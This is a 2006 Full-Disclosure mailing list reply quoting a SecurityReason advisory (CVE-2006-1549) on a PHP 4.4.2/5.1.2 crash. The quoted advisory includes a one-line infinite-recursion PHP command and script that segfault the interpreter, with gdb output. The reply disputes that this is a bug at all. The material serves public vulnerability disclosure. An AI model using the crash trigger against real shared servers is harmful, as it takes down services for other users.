On 4/8/06, Maksymilian Arciemowicz <[EMAIL PROTECTED]> wrote: > Source: http://securityreason.com/achievement_securityalert/35 > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > [function *() php/apache Crash PHP 4.4.2 and 5.1.2] > > Author: Maksymilian Arciemowicz (cXIb8O3) > Date: > - -Written: 21.3.2006 > - -Public: 8.4.2006 > from SECURITYREASON.COM > CVE-2006-1549 > > - --- 0.Description --- > PHP is an HTML-embedded scripting language. Much of its syntax is borrowed > from C, Java and Perl with a couple of unique PHP-specific features thrown > in. The goal of the language is to allow web developers to write dynamically > generated pages quickly. > > A nice introduction to PHP by Stig Sæther Bakken can be found at > http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the > PHP Conference Material is freely available. > > - --- 1. function *() Crash --- > PHP4/5 is vulnerability to a local denial-of-service. General problem is in > allocated data to memory. > > for example attack: > > cxib# php -r 'function cx(){ cx(); } cx();' > Segmentation fault (core dumped) > cxib# > > Segfault.. let`s see what we have in gdb > > - --- > cxib# cat /www/functionsegfault.php > <? > function cx(){ > cx(); > } > cx(); > ?> > cxib# gdb -q php > (gdb) r '/www/functionsegfault.php' > Starting program: /usr/local/bin/php '/www/functionsegfault.php' > > Program received signal SIGSEGV, Segmentation fault. > 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, > __zend_filename=0x811d8c0 > "/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", > __zend_lineno=1568) > at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111 > 111 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c: No such > file or directory. > in /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c > (gdb) bt > #0 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, > __zend_filename=0x811d8c0 > "/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", > __zend_lineno=1568) > at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111 > #1 0x080f042a in execute (op_array=0x81b3880) > at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1568 > #2 0x080f019a in execute (op_array=0x81b3880) > at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 > #3 0x080f019a in execute (op_array=0x81b3880) > at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 > #4 0x080f019a in execute (op_array=0x81b3880) > at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 > #5 0x080f019a in execute (op_array=0x81b3880) > ... > - --- > > or in apache error_log > > [Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal > instruction (4) > > - --- 2. Greets --- > > For: sp3x > and > p_e_a, pi3, eax, Infospec ;] > > - --- 3. Contact --- > Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com > GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg > SecurityReason.Com > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.2.2 (FreeBSD) > > iD8DBQFEOAT43Ke13X/fTO4RAiFnAKC+vzJm1w24b4VN9CMdhE6e6a2L4QCePbp7 > lNzhZke21IHXM0TvvjntXyY= > =Y7Ft > -----END PGP SIGNATURE----- >
fork bombs are something that MUST be handled by the operating system. recursive functions must be allowed in any programing language. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
